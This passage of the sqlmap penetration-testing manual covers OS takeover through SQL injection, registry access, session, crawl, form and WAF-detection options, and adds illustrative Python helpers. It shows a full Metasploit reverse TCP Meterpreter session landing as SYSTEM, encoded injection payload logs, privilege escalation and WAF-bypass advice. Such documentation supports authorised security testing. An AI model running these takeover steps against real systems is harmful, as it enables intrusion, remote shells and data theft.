sqlmap relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. These techniques are:

  • Database in-memory execution of the Metasploit’s shellcode via sqlmap own user-defined function sys_bineval(). Supported on MySQL and PostgreSQL – switch --os-pwn.
  • Upload and execution of a Metasploit’s stand-alone payload stager via sqlmap own user-defined function sys_exec() on MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL Server – switch --os-pwn.
  • Execution of Metasploit’s shellcode by performing a SMB reflection attack (MS08-068) with a UNC path request from the database server to the attacker’s machine where the Metasploit smb_relay server exploit listens. Supported when running sqlmap with high privileges (uid=0) on Linux/Unix and the target DBMS runs as Administrator on Windows – switch --os-smbrelay.
  • Database in-memory execution of the Metasploit’s shellcode by exploiting Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow (MS09-004). sqlmap has its own exploit to trigger the vulnerability with automatic DEP memory protection bypass, but it relies on Metasploit to generate the shellcode to get executed upon successful exploitation – switch --os-bof.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control and in the slide deck Expanding the control over the operating system from the database.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?\
id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on 
all ports 
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, p
lease wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_b
ineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) a
t Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter > exit

[*] Meterpreter session 1 closed.  Reason: User exit

By default MySQL on Windows runs as SYSTEM, whereas PostgreSQL runs as the low-privileged user postgres on both Windows and Linux. Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the time as NETWORK SERVICE and sometimes as LOCAL SERVICE.

It is possible to provide sqlmap with switch --priv-esc to perform a privilege escalation of the database process' user via Metasploit's getsystem command, which includes, among others, the kitrap0d technique (MS10-015).

Windows registry access

It is possible to access Windows registry when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and when the web application supports stacked queries. Also, session user has to have the needed privileges to access it.

Read a Windows registry key value

Switch: --reg-read

Using this switch you can read registry key values.

Write a Windows registry key value

Switch: --reg-add

Using this switch you can write registry key values.

Delete a Windows registry key

Switch: --reg-del

Using this switch you can delete registry keys.

Auxiliary registry options

Options: --reg-key, --reg-value, --reg-data and --reg-type

These options can be used to provide data needed for proper running of switches --reg-read, --reg-add and --reg-del. So, instead of providing registry key information when asked, you can use them at command prompt as program arguments.

With --reg-key option you specify used Windows registry key path, with --reg-value value item name inside provided key, with --reg-data value data, while with --reg-type option you specify type of the value item.

A sample command line for adding a registry value (a REG_SZ value named Test with data 1 under the key HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap) follows:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --r\
eg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-ty\
pe=REG_SZ --reg-data=1

General

These options can be used to set some general working parameters.

Load session from a stored (.sqlite) file

Option: -s

sqlmap automatically creates a persistent session SQLite file for each target, inside the dedicated output directory, where it stores all data required for resuming the session. If you want to set the session file location explicitly (e.g. to keep the session data for multiple targets in one place), use this option.

Log HTTP(s) traffic to a textual file

Option: -t

This option requires an argument that specifies the textual file to write all HTTP(S) traffic generated by sqlmap to – HTTP(S) requests and HTTP(S) responses.

This is useful primarily for debug purposes – when you provide the developers with a potential bug report, send this file too.

Act in non-interactive mode

Switch: --batch

If you want sqlmap to run as a batch tool, without any user’s interaction when sqlmap requires it, you can force that by using switch --batch. This will leave sqlmap to go with a default behaviour whenever user’s input would be required.

Binary content retrieval

Option --binary-fields

When retrieving binary content, as in the case of tables having column(s) with stored binary values (e.g. a column password holding binary password hashes), option --binary-fields tells sqlmap which fields need that special handling. The listed fields (i.e. table columns) are retrieved and represented in hexadecimal form, so that they can be processed afterwards with other tools (e.g. john).

Custom (blind) SQL injection charset

Option: --charset

During boolean-based blind and time-based blind SQL injection cases, user can force the usage of custom charset to speed-up the data retrieval process. For example, in case of dumping message digest values (e.g. SHA1), by using (e.g.) --charset="0123456789abcdef" expected number of requests is around 30% less than in regular run.

Crawl the website starting from the target URL

Option: --crawl

sqlmap can collect potentially vulnerable links by crawling the site starting from the target location. With this option you set a depth (distance from the starting location) beyond which sqlmap will not go while collecting links; the process is recursive for as long as there are new links to be visited.

Example run against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

Option --crawl-exclude

With this option you can exclude pages from crawling by providing a regular expression. For example, if you want to skip all pages that have the keyword logout in their paths, you can use --crawl-exclude=logout.
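
A minimal depth-bounded crawler with an exclusion regex, as an added Python example that is not sqlmap's crawler: a constructed in-memory site map (host target.example) replaces HTTP requests, links are resolved relative to the page they were found on, off-host links and URL fragments are dropped, and the URLs carrying a query string are the ones that would be handed on for injection testing.

```python
import re
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, urlunsplit

START = "http://target.example/"

# Constructed site map standing in for HTTP responses so the example runs
# offline; the host and pages are made up.
SITE = {
    START: '<a href="/news.php?id=1">news</a> <a href="/about">about</a> '
           '<a href="/logout.php">logout</a>',
    START + "news.php?id=1": '<a href="/news.php?id=2">next</a> '
                             '<a href="http://other.example/">elsewhere</a>',
    START + "news.php?id=2": '<a href="/archive.php?year=2018#top">archive</a>',
    START + "archive.php?year=2018": '<a href="/news.php?id=1">back</a>',
    START + "about": "",
    START + "logout.php": "",
}


def fetch(url):
    return SITE.get(url, "")


class LinkParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def crawl(start, depth, exclude=None):
    """Breadth-first crawl: pages at distance >= depth from the start are
    recorded but not expanded, links matching the exclude regex are skipped
    (what --crawl-exclude does), and only the start host is followed."""
    host = urlsplit(start).netloc
    exclude_re = re.compile(exclude) if exclude else None
    seen = {start}
    queue = deque([(start, 0)])
    while queue:
        url, dist = queue.popleft()
        if dist >= depth:
            continue
        parser = LinkParser()
        parser.feed(fetch(url))
        for href in parser.links:
            parts = urlsplit(urljoin(url, href))
            if parts.netloc != host:
                continue
            link = urlunsplit(parts._replace(fragment=""))  # fragments never reach the server
            if exclude_re and exclude_re.search(link):
                continue
            if link not in seen:
                seen.add(link)
                queue.append((link, dist + 1))
    return sorted(seen)


def with_parameters(urls):
    """Only URLs with a query string carry GET parameters worth injecting into."""
    return [u for u in urls if urlsplit(u).query]


if __name__ == "__main__":
    for d in (1, 2, 3):
        print(d, with_parameters(crawl(START, d)))
    print("excluding logout:", crawl(START, 3, exclude="logout"))
```

Excluding logout-style links matters for more than noise: following one during a crawl with an authenticated cookie (--cookie) silently ends the session and every later request is tested as an anonymous user.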

Delimiting character used in CSV output

Option: --csv-del

When data being dumped is stored into the CSV format (--dump-format=CSV), entries have to be separated with a “separation value” (default is ,). In case that user wants to override its default value he can use this option (e.g. --csv-del=";").

DBMS authentication credentials

Option: --dbms-cred

In some cases user will be warned that some operations failed because of lack of current DBMS user privileges and that he could try to use this option. In those cases, if he provides admin user credentials to sqlmap by using this option, sqlmap will try to rerun the problematic part with specialized “run as” mechanisms (e.g. OPENROWSET on Microsoft SQL Server) using those credentials.

Format of dumped data

Option: --dump-format

sqlmap supports three different types of formatting when storing dumped table data into the corresponding file inside an output directory: CSV, HTML and SQLITE. Default one is CSV, where each table row is stored into a textual file line by line, and where each entry is separated with a comma character , (or one provided with option --csv-del). In case of HTML, output is being stored into a HTML file, where each row is represented with a row inside a formatted table. In case of SQLITE, output is being stored into a SQLITE database, where original table content is replicated into the corresponding table having a same name.

Force character encoding used for data retrieval

Option: --encoding

For proper decoding of character data sqlmap uses either web server provided information (e.g. HTTP header Content-Type) or a heuristic result coming from a 3rd party library chardet.

Nevertheless, there are cases when this value has to be overwritten, especially when retrieving data containing international non-ASCII letters (e.g. --encoding=GBK). It has to be noted that there is a possibility that character information is going to be irreversibly lost due to implicit incompatibility between stored database content and used database connector at the target side.

Estimated time of arrival

Switch: --eta

It is possible to calculate and show in real time the estimated time of arrival to retrieve each query output. This is shown when the technique used to retrieve the output is any of the blind SQL injection types.

Example against an Oracle target affected only by boolean-based blind SQL injection:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id\
=1" -b --eta

[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19

Then:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2
.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

As you can see, sqlmap first calculates the length of the query output, then estimates the time of arrival, shows the progress in percentage and counts the number of retrieved output characters.

Flush session files

Option: --flush-session

As you are already familiar with the concept of a session file from the description above, it is good to know that you can flush the content of that file using option --flush-session. This way you can avoid the caching mechanisms implemented by default in sqlmap. Other possible way is to manually remove the session file(s).

Parse and test forms’ input fields

Switch: --forms

Say that you want to test against SQL injections a huge search form or you want to test a login bypass (typically only two input fields named like username and password), you can either pass to sqlmap the request in a request file (-r), set the POSTed data accordingly (--data) or let sqlmap do it for you!

Both of the above mentioned instances, and many others, appear as <form> and <input> tags in HTML response bodies and this is where this switch comes into play.

Provide sqlmap with --forms as well as the page where the form can be found as the target URL (-u) and sqlmap will request the target URL for you, parse the forms it has and guide you through to test for SQL injection on those form input fields (parameters) rather than the target URL provided.
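
Parsing forms into test targets, as an added Python example that is not sqlmap's implementation: a constructed login page (host target.example) contains a POST form and a GET form; each is turned into the URL plus POST data that one would otherwise pass by hand with -u and --data, keeping hidden and submit fields because the server may require them and each one is a candidate injection parameter.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin

# Constructed page with two forms; the URL and field names are made up.
PAGE_URL = "http://target.example/login.php"
PAGE_HTML = """
<form action="/auth.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf" value="abc123">
  <input type="submit" name="submit" value="Login">
</form>
<form action="search.php">
  <input name="q" type="search">
  <input type="submit" value="Go">
</form>
"""


class FormParser(HTMLParser):
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self.current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {
                "action": urljoin(self.base_url, a.get("action") or ""),
                "method": (a.get("method") or "GET").upper(),
                "fields": [],
            }
        elif tag == "input" and self.current is not None and a.get("name"):
            # every named field is kept, hidden and submit ones included:
            # the server may expect them and each is a candidate parameter
            self.current["fields"].append((a["name"], a.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            self.forms.append(self.current)
            self.current = None


def form_targets(base_url, html):
    """Return (method, url, post_data) triples: what gets tested in place of
    the page URL given with -u."""
    parser = FormParser(base_url)
    parser.feed(html)
    targets = []
    for f in parser.forms:
        data = urlencode(f["fields"])
        if f["method"] == "POST":
            targets.append(("POST", f["action"], data))
        else:
            url = f["action"]
            if data:
                url += ("&" if "?" in url else "?") + data
            targets.append(("GET", url, None))
    return targets


def sqlmap_args(target):
    """Equivalent manual invocation: -u plus --data for POST forms."""
    method, url, data = target
    args = ["-u", url]
    if method == "POST":
        args += ["--data", data]
    return args


if __name__ == "__main__":
    for t in form_targets(PAGE_URL, PAGE_HTML):
        print(" ".join(sqlmap_args(t)))
```

Note the empty text fields: a real run has to fill them with plausible values (sqlmap prompts for this), since a login handler that rejects an empty username before touching the database never reaches the injectable query.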

Ignore query results stored in session file

Switch: --fresh-queries

As you are already familiar with the concept of a session file from the description above, it is good to know that you can ignore the content of that file using option --fresh-queries. This way you can keep the session file untouched and for a selected run, avoid the resuming/restoring of queries output.

Use DBMS hex function(s) for data retrieval

Switch: --hex

In a lot of cases the retrieval of non-ASCII data requires special handling. One solution to that problem is the usage of the DBMS hex function(s). When turned on by this switch, data is encoded to its hexadecimal form before being retrieved and decoded back to its original form afterwards.

Example against a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --b\
anner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)
))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(
CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'
>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type num
eric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d
676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c20284465626961
6e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.p
hp</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by 
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

Custom output directory path

Option: --output-dir

sqlmap by default stores session and result files inside a subdirectory output. In case you want to use a different location, you can use this option (e.g. --output-dir=/tmp).

Parse DBMS error messages from response pages

Switch: --parse-errors

If the web application is configured in debug mode so that it displays in the HTTP responses the back-end database management system error messages, sqlmap can parse and display them for you.

This is useful for debugging purposes like understanding why a certain enumeration or takeover switch does not work – it might be a matter of session user’s privileges and in this case you would see a DBMS error message along the lines of Access denied for user <SESSION USER>.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --parse-errors
[...]
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the 
timeneeded to find the right number of query columns. Automatically extending th
e rangefor current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 i
s out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
[...]

Save options in a configuration INI file

Option: --save

It is possible to save the command line options to a configuration INI file. The generated file can then be edited and passed to sqlmap with the -c option as explained above.

Update sqlmap

Switch: --update

Using this switch you can update the tool to the latest development version directly from the Git repository. You obviously need Internet access.

If, for any reason, this operation fails, run git pull from your sqlmap working copy. It performs the exact same operation as switch --update. If you are running sqlmap on Windows, you can use the SmartGit client.

This is strongly recommended before reporting any bug to the mailing lists.

Miscellaneous

Use short mnemonics

Option: -z

It could become tedious to type all desired options and switches, especially those that are used most often (e.g. --batch --random-agent --ignore-proxy --technique=BEU). There is a simpler and much shorter way to deal with that problem. In sqlmap it’s called “mnemonics”.

Each option and switch can be written in a shorter mnemonic form using option -z, separated with a comma character (,), where a mnemonic is an arbitrarily chosen leading part of the original name. There is no strict mapping of options and switches to their respective shortened counterparts. The only required condition is that no other option or switch has the same prefix as the desired one.

Example:

$ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "ww\
w.target.com/vuln.php?id=1"

can be written (one of many ways) in shorter mnemonic form like:

$ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
1"

Another example:

$ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
b -T users -u "www.target.com/vuln.php?id=1"

can be written in shorter mnemonic form like:

$ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
com/vuln.php?id=1"
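The prefix rule described above is easy to get wrong by hand (a prefix that looks unique may match two options once more are added), so the following added example shows it as a small resolver. It is an illustration written for this page, not sqlmap's own -z code: LONG_OPTIONS is a constructed subset of sqlmap option names, dashes are ignored when comparing (the page's own "randoma" for --random-agent implies this), an exact name wins over longer siblings (so "dump" does not collide with "dump-all"), and anything else that matches more than one option is rejected instead of silently picking one.

```python
# Constructed subset of sqlmap long option names; the real list is far longer.
LONG_OPTIONS = [
    "batch", "random-agent", "ignore-proxy", "technique", "flush-session",
    "dump", "dump-all", "tamper", "test-filter", "test-skip", "threads",
]
# Single-letter options take their value as a separate argv element.
SHORT_OPTIONS = {"u", "p", "v", "m", "D", "T", "C"}


class MnemonicError(ValueError):
    """Raised when a mnemonic matches no option or more than one."""


def _norm(name: str) -> str:
    """Comparison form: dashes dropped, lower-cased."""
    return name.replace("-", "").lower()


def resolve_mnemonic(token, long_options=LONG_OPTIONS, short_options=SHORT_OPTIONS):
    """Expand one -z token (e.g. 'tec=BEU') into argv fragments (['--technique=BEU'])."""
    name, has_value, value = token.partition("=")
    if name in short_options:
        return [f"-{name}", value] if has_value else [f"-{name}"]
    wanted = _norm(name)
    matches = [o for o in long_options if _norm(o).startswith(wanted)]
    exact = [o for o in matches if _norm(o) == wanted]
    if exact:                       # 'dump' must not be blocked by 'dump-all'
        full = exact[0]
    elif len(matches) == 1:
        full = matches[0]
    elif not matches:
        raise MnemonicError(f"no option starts with {name!r}")
    else:
        raise MnemonicError(f"{name!r} is ambiguous: {matches}")
    return [f"--{full}={value}"] if has_value else [f"--{full}"]


def expand_mnemonics(spec: str) -> list:
    """Expand a whole -z string ('bat,randoma,ign,tec=BEU') into an argv list."""
    argv = []
    for token in spec.split(","):
        token = token.strip()
        if token:
            argv.extend(resolve_mnemonic(token))
    return argv


def fails_to_resolve(token: str) -> bool:
    """True when a token cannot be expanded to exactly one option."""
    try:
        resolve_mnemonic(token)
    except MnemonicError:
        return True
    return False


if __name__ == "__main__":
    print(expand_mnemonics("ign,flu,bat,tec=U,dump,D=testdb,T=users"))
```

A prefix such as "tes" is rejected here because both --test-filter and --test-skip start with it; that is the situation the text warns about, and an explicit error is preferable to a scan that silently ran with the wrong option.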

Alerting on successful SQL injection detection

Option: --alert

Set answers for questions

Option: --answers

In case the user wants to set up answers for questions automatically, even if --batch is used, this option allows it: provide any part of the question together with the answer after an equal sign. Answers for different questions can be separated with the delimiter character ,.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --te\
chnique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provide
d level (1) and risk (1)? [Y/n] N
[...]

Make a beep sound when SQL injection is found

Switch: --beep

If the user runs sqlmap with switch --beep, a beep sound warns them immediately when a SQL injection is found. This is especially useful when there is a large bulk list (option -m) of target URLs to be tested.

Cleanup the DBMS from sqlmap specific UDF(s) and table(s)

Switch: --cleanup

It is recommended to clean up the back-end database management system from sqlmap temporary table(s) and created user-defined function(s) when you are done taking over the underlying operating system or file system. Switch --cleanup will attempt to clean up the DBMS and the file system wherever possible.

Check for dependencies

Switch: --dependencies

sqlmap in some special cases requires independent installation of extra 3rd party libraries (e.g. options -d, switch --os-pwn in case of icmpsh tunneling, option --auth-type in case of NTLM HTTP authentication type, etc.) and it will warn the user only in such special cases. But, if you want to independently check for all those extra 3rd party library dependencies you can use switch --dependencies.

$ python sqlmap.py --dependencies
[...]
[xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
 order to directly connect to the DBMS Firebird. Download from http://kinterbasd
b.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
rge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
unt/PyMySQL/
[xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
ceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
sycopg/
[xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
p/ibm-db/
[xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
rty library in order to directly connect to the DBMS HSQLDB. Download from https
://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
googlecode.com/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
mssql.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
an to attack a web application behind NTLM authentication. Download from http://
code.google.com/p/python-ntlm/
[xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
ou plan to attack a web application using WebSocket. Download from https://pypi.
python.org/pypi/websocket-client/

Disable console output coloring

Switch: --disable-coloring

sqlmap by default uses coloring while writing to the console. In case of undesired effects (e.g. console appearance of uninterpreted ANSI coloring codes like \x01\x1b[0;32m\x02[INFO]) you can disable console output coloring by using this switch.

Use Google dork results from specified page number

Option: --gpage

Default sqlmap behavior with option -g is to do a Google search and use the first 100 resulting URLs for further SQL injection testing. In combination with option -g, this option (--gpage) lets you specify a page other than the first one to retrieve target URLs from.

Use HTTP parameter pollution

Switch: --hpp

HTTP parameter pollution (HPP) is a method for bypassing WAF/IPS/IDS protection mechanisms (explained here) that is particularly effective against ASP/IIS and ASP.NET/IIS platforms. If you suspect that the target is behind such protection, you can try to bypass it by using this switch.

Make a thorough test for WAF/IPS/IDS protection

Switch: --identify-waf

sqlmap can try to identify backend WAF/IPS/IDS protection (if any) so that the user can take appropriate steps (e.g. use tamper scripts with --tamper). Currently around 30 different products are supported (Airlock, Barracuda WAF, etc.) and their respective WAF scripts can be found inside the waf directory.

Example against a MySQL target protected by the ModSecurity WAF:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
dentify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (Un
ited Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application 
Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)
'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Ak
amai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application 
Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application S
ecurity (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firew
all (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Appli
cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
-tamper')
[...]

Skip heuristic detection of WAF/IPS/IDS protection

Switch: --skip-waf

